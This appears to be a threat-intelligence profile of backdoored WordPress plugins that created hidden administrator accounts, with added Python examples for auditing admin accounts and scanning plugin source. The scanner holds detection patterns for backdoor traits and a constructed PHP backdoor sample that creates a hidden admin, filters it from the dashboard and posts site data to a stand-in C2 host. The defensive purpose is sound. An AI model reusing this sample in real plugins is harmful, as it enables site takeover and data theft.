Backdoored WordPress Plugins
Type of Malware | Backdoor
Date of Initial Activity | 2024
Motivation | Financial Gain
Attack Vectors | Supply Chain
Overview
The attack on WordPress plugins described here illustrates the growing sophistication of supply-chain attacks against widely used content management systems (CMS). In this incident, attackers backdoored multiple WordPress plugins, affecting approximately 36,000 websites globally. By embedding malicious code in what appeared to be legitimate plugin updates, they caused the affected sites to create hidden administrative accounts. These accounts gave the attackers unrestricted access, allowing them to steal sensitive data, execute arbitrary code, and take full control of the compromised sites.
The technical execution of this attack is a textbook example of how criminals exploit the trust users place in well-known plugins. When a site installed or updated one of the compromised plugins, the malicious code ran as part of the plugin, with the same privileges as the rest of the site's PHP code. It typically contained functions that created new administrator accounts or altered existing ones, usually without the site owner's knowledge. Once an administrator account existed, the attackers could log in to the backend, install additional malware, modify content, and exfiltrate data.
Targets
Information
How they operate
At the core of this attack is the injection of malicious code into the plugin's source files. When a user updates or installs one of the compromised plugins, the code executes automatically within the WordPress environment and performs several key actions. First, it creates a hidden administrative account. This account typically has a non-standard username and a randomized password, so it does not stand out during routine monitoring, and it is granted the administrator role, giving the attackers complete control over the website. Because such an account is stored in the wp_users and wp_usermeta tables like any other user, the dependable check is to enumerate every account holding the administrator role directly in the database and compare it against the administrators the site owner actually expects, rather than relying on the user list shown in the dashboard, which plugin code can filter.
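The database-side check described above, as an added example that is not code from the page or from any plugin. It assumes the standard WordPress schema, where a user's roles are stored in wp_usermeta under meta_key wp_capabilities as a PHP-serialized array such as a:1:{s:13:"administrator";b:1;}, and it assumes the site owner keeps an allowlist of expected administrator logins (EXPECTED_ADMINS is hypothetical). The user rows are constructed sample data, not data from a real site.

```python
"""Audit WordPress user tables for administrator accounts that should not exist.

Added example for this page; it is not code from the page or from any plugin.
Assumptions: the standard WordPress schema, where a user's roles are stored in
wp_usermeta under meta_key 'wp_capabilities' as a PHP-serialized array such as
a:1:{s:13:"administrator";b:1;}, and a site-specific allowlist of expected
administrator logins maintained by the owner (EXPECTED_ADMINS below is hypothetical).
All rows below are constructed sample data, not data from a real site.
"""
import re

# Constructed sample of: SELECT ID, user_login, user_email, user_registered FROM wp_users
WP_USERS = [
    (1, "alice", "alice@example.com", "2021-03-04 10:12:00"),
    (2, "editor-bob", "bob@example.com", "2022-07-19 08:30:11"),
    (3, "wpsupport_9f3a", "wp@internal.invalid", "2024-06-22 03:14:07"),  # constructed backdoor account
]

# Constructed sample of: SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'wp_capabilities'
WP_CAPABILITIES = {
    1: 'a:1:{s:13:"administrator";b:1;}',
    2: 'a:1:{s:6:"editor";b:1;}',
    3: 'a:1:{s:13:"administrator";b:1;}',
}

# Hypothetical allowlist: the only logins that are supposed to hold the administrator role.
EXPECTED_ADMINS = {"alice"}

# Matches each role entry in the serialized array whose value is boolean true (b:1).
_ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_capabilities(serialized):
    """Return the set of role names enabled in a serialized wp_capabilities value."""
    return set(_ROLE_RE.findall(serialized))


def find_unexpected_admins(users, capabilities, expected_admins, since=None):
    """Return [(user_login, [reasons])] for every administrator account that is not on the
    allowlist or was registered on/after `since` (an ISO date such as the day a suspect
    plugin update was installed).  WordPress stores user_registered as 'YYYY-MM-DD HH:MM:SS',
    so the plain string comparison below is a correct chronological comparison."""
    findings = []
    for user_id, login, _email, registered in users:
        if "administrator" not in roles_from_capabilities(capabilities.get(user_id, "")):
            continue
        reasons = []
        if login not in expected_admins:
            reasons.append("not in administrator allowlist")
        if since is not None and registered >= since:
            reasons.append(f"registered {registered}, on or after {since}")
        if reasons:
            findings.append((login, reasons))
    return findings


if __name__ == "__main__":
    for login, reasons in find_unexpected_admins(WP_USERS, WP_CAPABILITIES, EXPECTED_ADMINS, since="2024-06-01"):
        print(f"SUSPICIOUS ADMINISTRATOR {login}: {'; '.join(reasons)}")
```

On a real site the two lists come from the two SELECT statements shown in the comments, run directly against the database (the wp_ table prefix is configurable and may differ). Feeding the query results in rather than the dashboard's user list matters because the same plugin code that created the account can also filter what the dashboard shows.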
Once the administrative account is established, the attackers can leverage it to further compromise the site. They can access the WordPress dashboard, modify or delete content, install additional malware, and exfiltrate sensitive data. In some cases, the backdoor also includes functions to communicate with a command-and-control (C2) server, allowing the attackers to issue remote commands or update the malicious payload. This capability lets the attackers maintain persistence on the compromised site even if the initial infection vector is discovered and removed. For the same reason, removing or downgrading the plugin is not sufficient remediation: any administrator accounts and additional files the backdoor created persist independently of it, and credentials and API keys reachable from the site should be treated as exposed.
Another key aspect of these backdoored plugins is their ability to evade detection. The malicious code is often obfuscated or hidden within legitimate-looking code blocks, making it difficult for automated security scanners or even human reviewers to identify. Additionally, because the code executes as part of the plugin's normal functionality, it blends in with legitimate operations, further reducing the likelihood of detection. This stealthy approach allows the attackers to retain access to compromised websites for extended periods, often until the site administrators notice unusual behavior or a security audit is conducted. Comparing the installed plugin files against a clean copy of the same version obtained from the official repository is a more reliable check than pattern scanning, since injected code shows up as a file difference regardless of how it is obfuscated.
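A source-level triage scanner for the traits described in the two paragraphs above (administrator account creation, user-list hiding, C2 call-outs, and decode-then-execute obfuscation), as an added example that is not code from the page or from any plugin. The indicator list and weights are this example's own choices for ranking files for manual review, not a complete or authoritative signature set; the PHP snippet it scans is constructed to exercise the scanner and is not from a real plugin.

```python
"""Static triage of WordPress plugin source for the backdoor traits described above.

Added example for this page; it is not code from the page or from any plugin,
and the indicator list and weights are this example's own choices (common
patterns for triage, not a complete or authoritative signature set).  The PHP
at the bottom is constructed to exercise the scanner and is not from a real plugin.
"""
import os
import re

# (name, pattern, weight): weights rank files for manual review, they are not a verdict.
INDICATORS = [
    # Creating a user from plugin code
    ("user_creation", re.compile(r"\b(?:wp_insert_user|wp_create_user)\s*\("), 3),
    # Granting the administrator role, either at creation or afterwards
    ("administrator_role", re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]|set_role\s*\(\s*['\"]administrator['\"]"), 4),
    # Hooks that can filter the account out of the dashboard's user list and counts
    ("user_list_hiding", re.compile(r"add_(?:filter|action)\s*\(\s*['\"](?:pre_user_query|views_users|wp_count_users)['\"]"), 4),
    # Decode-then-execute chains typical of obfuscated payloads
    ("obfuscated_execution", re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("), 5),
    # Long base64-looking literals embedded in source
    ("encoded_blob", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 2),
    # Outbound HTTP to a hard-coded host (possible command-and-control)
    ("outbound_http", re.compile(r"\b(?:wp_remote_(?:get|post|request)|curl_init|file_get_contents)\s*\(\s*['\"]https?://"), 3),
]


def scan_source(text):
    """Return {indicator_name: [line numbers]} for every indicator that matches in `text`."""
    hits = {}
    for name, pattern, _weight in INDICATORS:
        lines = [text.count("\n", 0, m.start()) + 1 for m in pattern.finditer(text)]
        if lines:
            hits[name] = lines
    return hits


def risk_score(hits):
    """Sum the weights of the indicators that fired."""
    weights = {name: weight for name, _pattern, weight in INDICATORS}
    return sum(weights[name] for name in hits)


def scan_tree(root):
    """Scan every .php file under `root` (e.g. wp-content/plugins); return
    {relative_path: (score, hits)} for files with at least one hit, highest score first."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                results[os.path.relpath(path, root)] = (risk_score(hits), hits)
    return dict(sorted(results.items(), key=lambda item: item[1][0], reverse=True))


# Constructed sample: a backdoor of the kind described, wrapped in legitimate-looking plugin code.
SAMPLE_PLUGIN = r'''<?php
/* Plugin Name: Example Widget */
function ew_register_widget() { /* legitimate-looking plugin code */ }
add_action('widgets_init', 'ew_register_widget');

function ew_maint() {
    $u = wp_insert_user(array('user_login' => 'wpsupport_' . substr(md5(home_url()), 0, 4),
                              'user_pass'  => wp_generate_password(24),
                              'role'       => 'administrator'));
    add_filter('pre_user_query', function ($q) { /* hide the account from wp-admin/users.php */ });
    wp_remote_post('https://c2.invalid/report', array('body' => array('site' => home_url(), 'uid' => $u)));
}
add_action('init', 'ew_maint');
eval(base64_decode('cGhwaW5mbygpOw=='));
'''


if __name__ == "__main__":
    sample_hits = scan_source(SAMPLE_PLUGIN)
    print(f"sample score {risk_score(sample_hits)}: {sample_hits}")
```

Run scan_tree against a copy of wp-content/plugins and review the highest-scoring files first. Several indicators fire on legitimate code too (membership plugins create users, and pre_user_query has honest uses), so a score is a queue for review, and a clean diff against the official copy of the same plugin version remains the decisive check.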